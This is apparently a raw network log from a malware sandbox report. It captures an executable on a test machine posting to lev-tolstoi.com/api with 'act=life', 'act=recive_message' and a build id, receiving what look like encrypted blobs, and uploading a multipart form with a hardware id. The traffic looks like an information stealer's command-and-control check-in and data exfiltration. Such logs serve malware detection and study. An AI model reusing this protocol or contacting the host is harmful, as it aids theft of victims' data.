                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                      2024-12-18 10:33:03 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                      2024-12-18 10:33:03 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.549708104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:04 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2024-12-18 10:33:08 UTC1035INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=rd0l120js5vdp280usc9a47p5m; expires=Sun, 13-Apr-2025 04:19:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4O5awnt9PD7TIp9sGKBzRayt%2FldMqcc%2Fq%2BSv2U3X6L13K1tiWIX1DCgnC5BN1SfBkWbIfkD4yoKx1xxn9G4Bbz43kRtf5wtnCg0uHnLdTnuyx92zYflBywdxN56Mip3ehk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e1dae7419bf-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2236&min_rtt=2103&rtt_var=884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1388492&cwnd=211&unsent_bytes=0&cid=2b42aaef7dbd949a&ts=4214&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                      2024-12-18 10:33:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.549712104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:10 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 48
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:10 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 55 6e 69 71 75 65 26 6a 3d
                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=FATE99--Unique&j=
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1045INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=5llfi2e8i3h6etiohtm28ukcjp; expires=Sun, 13-Apr-2025 04:19:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=we%2BLeDuvlYrD8S%2BJwKONMJEgAUJBUf%2FE%2FoZl%2Fb%2B1yx20lEso2U2uPkoaNzxk7Ci3z5dAS11loG8MMz%2BHcEkFXCke2QZxOQzxXGTojoftsT42iIuqbdQlIXT%2BgkTwC93jOLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e41ca510fa4-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1528&rtt_var=584&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=947&delivery_rate=1855146&cwnd=176&unsent_bytes=0&cid=d4edbed7611e196b&ts=1048&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC324INData Raw: 31 64 33 35 0d 0a 30 71 64 51 44 45 41 36 48 2b 64 2f 50 6b 4e 55 62 63 78 39 35 59 41 6e 6d 68 56 55 32 54 59 4d 4a 6d 39 63 48 6c 6f 6a 58 6c 36 70 68 53 59 75 65 67 34 7a 78 51 78 62 59 57 34 5a 76 67 69 41 72 41 58 37 63 58 62 6a 55 47 31 4b 48 44 6b 79 65 46 55 7a 66 4f 6a 42 4d 57 41 7a 58 7a 50 46 47 6b 5a 68 62 6a 61 33 58 34 44 75 42 61 41 33 4d 62 4e 55 62 55 6f 4e 50 58 55 31 55 7a 49 39 75 73 73 33 5a 43 56 5a 65 34 59 54 55 79 59 78 43 4b 30 58 69 2b 6c 4b 38 6e 68 32 39 52 52 70 58 45 31 6d 50 42 64 47 4b 6a 2b 66 78 69 4e 6e 59 6b 63 7a 6e 46 31 62 4c 58 5a 58 37 68 79 41 34 6b 76 38 63 54 2b 78 58 6d 52 43 44 44 68 30 4b 6b 6f 34 4e 72 72 46 4e 47 55 76 55 47 2b 4c 47 56 51 74 4e 77 4b 74 58 38 6d 69 51 75 41 33 62 76 73 48 58 45 63 63 4c
                                                                                                                                                                                                                                      Data Ascii: 1d350qdQDEA6H+d/PkNUbcx95YAnmhVU2TYMJm9cHlojXl6phSYueg4zxQxbYW4ZvgiArAX7cXbjUG1KHDkyeFUzfOjBMWAzXzPFGkZhbja3X4DuBaA3MbNUbUoNPXU1UzI9uss3ZCVZe4YTUyYxCK0Xi+lK8nh29RRpXE1mPBdGKj+fxiNnYkcznF1bLXZX7hyA4kv8cT+xXmRCDDh0Kko4NrrFNGUvUG+LGVQtNwKtX8miQuA3bvsHXEccL
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 2f 66 6f 6d 58 6f 64 44 57 76 57 58 38 45 45 6e 42 6c 65 45 59 77 66 4f 69 46 4e 47 41 6a 56 58 32 58 46 56 63 71 4d 78 32 6c 46 6f 72 76 52 66 56 39 4f 62 68 55 61 55 34 48 4d 58 59 38 54 44 45 36 73 4d 56 79 49 47 4a 66 5a 63 56 46 48 41 49 7a 48 36 6b 54 6b 61 42 2f 75 47 68 34 6f 68 52 70 53 45 31 6d 50 44 42 45 50 7a 2b 37 79 6a 46 6d 4b 55 70 39 6c 78 74 52 4a 43 51 4a 71 78 47 4e 34 56 66 79 65 54 43 34 58 57 56 4e 43 44 6c 34 65 41 39 38 4f 36 69 46 61 69 34 44 56 58 61 4a 46 30 73 68 64 68 44 67 42 73 66 6c 53 62 67 76 64 72 39 56 61 6b 55 4a 4d 48 49 38 54 54 6f 79 76 63 6f 30 5a 43 4a 66 64 34 30 56 58 53 77 39 41 4b 34 61 69 75 5a 44 39 48 59 7a 2b 78 6f 75 51 78 56 2b 4a 48 68 76 4f 7a 2b 69 68 77 64 74 4c 46 5a 36 6b 31 31 44 62 79 39 50 71
                                                                                                                                                                                                                                      Data Ascii: /fomXodDWvWX8EEnBleEYwfOiFNGAjVX2XFVcqMx2lForvRfV9ObhUaU4HMXY8TDE6sMVyIGJfZcVFHAIzH6kTkaB/uGh4ohRpSE1mPDBEPz+7yjFmKUp9lxtRJCQJqxGN4VfyeTC4XWVNCDl4eA98O6iFai4DVXaJF0shdhDgBsflSbgvdr9VakUJMHI8TToyvco0ZCJfd40VXSw9AK4aiuZD9HYz+xouQxV+JHhvOz+ihwdtLFZ6k11Dby9Pq
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 4e 2f 58 59 38 73 52 51 67 42 41 6f 6d 50 47 41 42 44 53 75 37 68 77 64 74 4c 46 5a 36 6b 31 31 44 62 79 39 50 71 52 50 48 75 67 58 31 66 7a 4f 2b 57 32 39 4f 41 7a 74 32 4e 45 6b 79 50 36 4c 4b 4e 6d 34 75 55 48 65 49 45 31 67 70 50 77 53 6c 47 59 66 6a 54 37 67 35 64 72 78 4d 4c 68 78 4e 43 6e 73 30 54 44 4e 2b 68 63 59 38 59 43 56 4f 50 5a 70 54 52 57 45 78 41 2b 35 48 78 2b 35 4d 2b 48 77 38 76 31 52 70 53 51 67 39 65 7a 74 4d 4f 7a 61 2b 77 6a 5a 69 4b 31 56 37 68 52 70 59 4a 43 51 4b 70 78 4f 4c 6f 67 75 34 63 43 37 37 44 43 35 72 43 69 68 2f 46 30 49 74 4e 66 44 61 66 48 64 69 58 33 48 46 52 52 77 6d 4d 77 65 6c 47 59 2f 69 56 2f 31 35 50 62 70 65 61 45 55 41 4d 6e 6f 34 51 44 77 36 76 4d 55 31 61 54 42 4b 65 49 4d 50 56 6d 46 34 54 36 6b 48 78 37
                                                                                                                                                                                                                                      Data Ascii: N/XY8sRQgBAomPGABDSu7hwdtLFZ6k11Dby9PqRPHugX1fzO+W29OAzt2NEkyP6LKNm4uUHeIE1gpPwSlGYfjT7g5drxMLhxNCns0TDN+hcY8YCVOPZpTRWExA+5Hx+5M+Hw8v1RpSQg9eztMOza+wjZiK1V7hRpYJCQKpxOLogu4cC77DC5rCih/F0ItNfDafHdiX3HFRRwmMwelGY/iV/15PbpeaEUAMno4QDw6vMU1aTBKeIMPVmF4T6kHx7
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 64 75 4d 55 62 55 73 45 4d 58 51 77 54 6a 4d 34 76 73 4d 30 59 79 64 58 64 35 63 56 55 69 77 39 41 4b 55 4e 68 2b 39 42 39 48 4d 2b 73 46 34 75 43 6b 30 35 5a 48 67 5a 66 41 6d 39 79 6a 4a 74 4e 42 68 69 79 77 51 63 4a 6a 70 50 39 6c 2b 4c 37 45 58 33 65 7a 71 77 58 47 39 49 41 7a 6c 35 4d 55 6b 30 4c 72 48 42 4f 6d 38 73 56 33 79 42 47 46 6b 6c 4d 51 75 6f 45 4d 65 73 42 66 39 76 64 75 4d 55 51 57 4d 34 66 46 30 43 41 53 4e 79 71 59 55 31 59 6d 49 41 50 59 6b 65 55 43 6b 35 43 61 63 54 6a 65 74 4f 39 48 77 79 74 31 31 72 51 67 77 37 65 54 6c 46 4d 44 61 32 78 6a 46 68 4c 56 64 31 78 56 4d 63 4a 69 35 50 39 6c 2b 69 39 55 37 32 63 58 61 6b 47 6e 63 45 43 6a 49 38 59 41 45 77 4e 62 62 44 4e 32 49 6a 58 6e 57 41 46 56 67 67 4d 41 6d 74 45 49 50 6e 52 50 64
                                                                                                                                                                                                                                      Data Ascii: duMUbUsEMXQwTjM4vsM0YydXd5cVUiw9AKUNh+9B9HM+sF4uCk05ZHgZfAm9yjJtNBhiywQcJjpP9l+L7EX3ezqwXG9IAzl5MUk0LrHBOm8sV3yBGFklMQuoEMesBf9vduMUQWM4fF0CASNyqYU1YmIAPYkeUCk5CacTjetO9Hwyt11rQgw7eTlFMDa2xjFhLVd1xVMcJi5P9l+i9U72cXakGncECjI8YAEwNbbDN2IjXnWAFVggMAmtEIPnRPd
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 32 31 57 44 44 4e 33 4b 6b 59 7a 4f 4c 66 4a 4e 47 45 6b 57 58 69 50 45 56 73 6b 50 51 43 69 58 38 6d 69 51 75 41 33 62 76 74 36 5a 56 63 61 50 58 49 7a 56 79 64 38 72 34 73 72 4c 69 56 55 50 64 31 64 58 79 6f 39 43 36 34 54 68 2b 5a 49 2b 47 55 35 76 46 4e 6e 54 78 38 30 65 7a 39 4b 4e 44 65 2f 77 79 42 69 4c 45 70 34 6c 77 38 63 62 33 59 49 74 6c 2f 66 6f 6e 50 2f 5a 79 61 34 46 6c 39 53 44 69 68 33 4e 55 31 38 49 2f 37 63 63 6d 6b 75 47 43 58 46 47 31 4d 6f 4e 51 43 76 46 6f 76 76 51 50 46 79 4e 37 31 51 5a 45 34 4e 4f 48 6f 35 52 44 59 2f 73 63 38 37 61 53 70 66 66 70 64 64 45 6d 45 78 46 2b 35 48 78 38 74 43 36 6e 6b 6d 2b 30 73 67 58 55 30 35 63 48 67 5a 66 44 69 36 79 6a 5a 70 4c 6c 35 34 67 78 42 64 4c 6a 63 50 6f 52 75 4d 36 30 50 35 65 6a 4f 32
                                                                                                                                                                                                                                      Data Ascii: 21WDDN3KkYzOLfJNGEkWXiPEVskPQCiX8miQuA3bvt6ZVcaPXIzVyd8r4srLiVUPd1dXyo9C64Th+ZI+GU5vFNnTx80ez9KNDe/wyBiLEp4lw8cb3YItl/fonP/Zya4Fl9SDih3NU18I/7ccmkuGCXFG1MoNQCvFovvQPFyN71QZE4NOHo5RDY/sc87aSpffpddEmExF+5Hx8tC6nkm+0sgXU05cHgZfDi6yjZpLl54gxBdLjcPoRuM60P5ejO2
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 6f 79 50 47 41 42 50 44 61 31 7a 7a 39 74 4c 56 74 76 68 42 74 4f 49 54 73 46 76 42 57 4d 35 30 6a 31 65 6a 57 39 55 6d 56 49 48 7a 64 38 4f 30 70 38 63 76 44 43 4b 69 35 36 47 46 36 53 43 31 59 6d 4f 68 6d 6c 48 6f 54 30 53 4f 67 33 65 50 74 46 61 56 56 4e 5a 6d 6f 6f 56 6a 73 6a 2f 74 78 79 61 53 34 59 4a 63 55 62 56 53 63 78 43 61 41 4e 67 75 52 4b 39 33 34 2f 76 31 78 74 52 41 6b 36 65 7a 31 43 4d 44 65 33 78 6a 31 71 4b 31 5a 30 69 6c 30 53 59 54 45 58 37 6b 66 48 77 31 37 37 65 7a 76 37 53 79 42 64 54 54 6c 77 65 42 6c 38 4d 4c 37 41 4d 6d 51 6b 58 48 69 44 46 31 6b 68 50 51 79 68 47 34 48 6d 53 76 68 38 50 37 70 53 61 30 34 47 4f 48 45 37 52 7a 70 38 2f 6f 55 31 64 6d 49 41 50 61 55 47 55 53 30 78 54 37 46 52 6e 71 4a 43 39 44 64 75 2b 31 39 69 51
                                                                                                                                                                                                                                      Data Ascii: oyPGABPDa1zz9tLVtvhBtOITsFvBWM50j1ejW9UmVIHzd8O0p8cvDCKi56GF6SC1YmOhmlHoT0SOg3ePtFaVVNZmooVjsj/txyaS4YJcUbVScxCaANguRK934/v1xtRAk6ez1CMDe3xj1qK1Z0il0SYTEX7kfHw177ezv7SyBdTTlweBl8ML7AMmQkXHiDF1khPQyhG4HmSvh8P7pSa04GOHE7Rzp8/oU1dmIAPaUGUS0xT7FRnqJC9Ddu+19iQ
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC316INData Raw: 67 41 57 52 38 6e 38 49 6b 62 51 31 62 62 49 78 64 45 6d 45 78 47 65 35 48 78 39 77 46 36 6e 51 6d 75 46 74 2f 65 6b 31 6d 5a 51 59 42 4e 79 71 33 31 54 46 34 4b 56 56 78 6c 43 4d 63 65 57 4a 64 2f 45 33 56 73 46 71 34 61 41 6e 31 46 47 38 45 56 51 64 6c 65 46 64 38 5a 4f 4b 4c 63 6e 78 69 41 44 33 43 48 6b 34 7a 4d 41 79 34 48 4d 44 63 65 39 39 68 50 4c 78 45 61 56 4d 43 66 6a 4a 34 54 6e 78 6b 69 59 55 37 61 54 6c 4a 61 34 67 4e 57 32 45 4a 51 65 34 48 78 37 6f 46 7a 58 51 34 74 56 4e 34 56 55 41 5a 61 6a 4a 47 4c 44 75 6e 79 6e 49 67 59 6c 34 39 33 55 34 53 59 54 49 65 37 6b 66 58 73 42 36 74 4a 47 48 72 42 6e 45 4b 46 48 35 71 65 42 6c 75 63 76 44 58 63 6a 5a 69 48 33 36 58 44 31 6f 69 49 41 7a 70 49 62 6e 46 58 2f 56 78 49 61 70 71 55 45 4d 58 4d 33
                                                                                                                                                                                                                                      Data Ascii: gAWR8n8IkbQ1bbIxdEmExGe5Hx9wF6nQmuFt/ek1mZQYBNyq31TF4KVVxlCMceWJd/E3VsFq4aAn1FG8EVQdleFd8ZOKLcnxiAD3CHk4zMAy4HMDce99hPLxEaVMCfjJ4TnxkiYU7aTlJa4gNW2EJQe4Hx7oFzXQ4tVN4VUAZajJGLDunynIgYl493U4SYTIe7kfXsB6tJGHrBnEKFH5qeBlucvDXcjZiH36XD1oiIAzpIbnFX/VxIapqUEMXM3
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 32 62 65 37 0d 0a 31 30 45 63 58 68 50 71 67 37 48 75 68 57 71 4c 47 50 6f 41 7a 34 57 45 6e 42 6c 65 46 64 38 5a 4f 4b 4c 63 6e 78 69 41 44 33 43 48 6b 34 7a 4d 41 79 34 48 4d 44 63 65 39 5a 77 4d 4c 35 54 66 67 59 6a 4e 57 67 2f 41 58 4a 38 76 34 56 71 56 32 49 51 50 62 70 54 48 44 6c 32 56 2b 34 71 68 4f 78 4c 2f 32 45 6e 39 6e 70 70 51 67 67 35 62 48 70 76 4e 79 69 33 68 58 77 75 4a 42 67 6c 31 56 4d 63 4a 53 64 50 39 6b 2f 56 75 52 43 72 49 47 62 70 53 79 42 64 54 53 67 38 59 42 4e 79 66 4b 4b 46 61 69 35 6c 57 32 2b 58 47 31 38 33 4e 55 69 51 49 59 54 30 53 50 64 38 4e 34 56 71 51 45 6b 4d 50 58 4a 36 63 43 6f 78 6f 4d 59 33 61 52 78 6d 63 34 49 4a 57 79 38 77 44 2b 35 52 78 2b 30 46 6f 45 35 32 38 78 52 52 43 6b 30 6d 50 47 41 42 43 54 2b 2b 79 7a
                                                                                                                                                                                                                                      Data Ascii: 2be710EcXhPqg7HuhWqLGPoAz4WEnBleFd8ZOKLcnxiAD3CHk4zMAy4HMDce9ZwML5TfgYjNWg/AXJ8v4VqV2IQPbpTHDl2V+4qhOxL/2En9nppQgg5bHpvNyi3hXwuJBgl1VMcJSdP9k/VuRCrIGbpSyBdTSg8YBNyfKKFai5lW2+XG183NUiQIYT0SPd8N4VqQEkMPXJ6cCoxoMY3aRxmc4IJWy8wD+5Rx+0FoE528xRRCk0mPGABCT++yz
                                                                                                                                                                                                                                      2024-12-18 10:33:11 UTC1369INData Raw: 61 38 56 46 44 6d 39 32 48 65 35 48 78 36 56 47 36 6d 55 77 75 45 4a 74 41 7a 4d 41 57 7a 5a 47 50 53 71 67 79 44 35 50 49 55 6c 33 75 79 4e 4a 49 6a 67 42 71 51 6d 57 6f 67 75 34 65 48 62 6a 62 53 34 4d 54 51 45 79 65 46 6c 38 5a 50 44 77 4d 57 41 73 58 32 75 55 55 48 73 76 4d 51 36 34 44 34 72 75 5a 50 74 6d 50 50 73 61 4c 6b 4a 4e 5a 69 35 32 41 54 67 74 38 4a 31 69 50 48 6b 4e 4c 74 4a 4e 44 6a 35 34 46 75 34 4a 78 37 6f 58 74 6a 63 6b 2b 77 77 75 41 77 34 73 62 6a 35 43 4b 6a 2f 33 2b 77 78 4c 4e 56 74 74 67 78 35 69 48 78 30 44 71 42 69 64 35 55 50 65 56 33 62 31 46 47 45 45 56 51 63 38 63 41 45 44 63 76 44 64 63 6a 5a 69 62 58 36 4c 45 31 73 33 4a 30 4b 4c 43 49 54 79 51 2f 73 33 65 50 74 53 4c 68 78 64 63 44 77 38 55 48 78 6b 34 4a 64 70 4f 33 45
                                                                                                                                                                                                                                      Data Ascii: a8VFDm92He5Hx6VG6mUwuEJtAzMAWzZGPSqgyD5PIUl3uyNJIjgBqQmWogu4eHbjbS4MTQEyeFl8ZPDwMWAsX2uUUHsvMQ64D4ruZPtmPPsaLkJNZi52ATgt8J1iPHkNLtJNDj54Fu4Jx7oXtjck+wwuAw4sbj5CKj/3+wxLNVttgx5iHx0DqBid5UPeV3b1FGEEVQc8cAEDcvDdcjZibX6LE1s3J0KLCITyQ/s3ePtSLhxdcDw8UHxk4JdpO3E


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.549713104.21.66.864436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:12 UTC294OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVV
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 12914
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 10:33:12 UTC12914OUTData Raw: 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                                      Data Ascii: --PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition:
                                                                                                                                                                                                                                      2024-12-18 10:33:15 UTC1034INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=9pfe3pdsgpkuupfmkdbnti04it; expires=Sun, 13-Apr-2025 04:19:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xl9Xy8mReZ28R6hRroAtqGm1RsrZWM6SGEIAd17HTrM2AJpk4IK7AI507RHlClYjgHZK6pkOqL2B7zKu4WDAGUcS9SnYMDxn5n9%2FBxI8IETMhI3UmSpq9GTE0TiDDg6UDGI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e5139c67ce4-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1832&rtt_var=699&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13866&delivery_rate=1593886&cwnd=228&unsent_bytes=0&cid=03d12b4dc1bf013b&ts=2280&x=0"
                                                                                                                                                                                                                                      2024-12-18 10:33:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
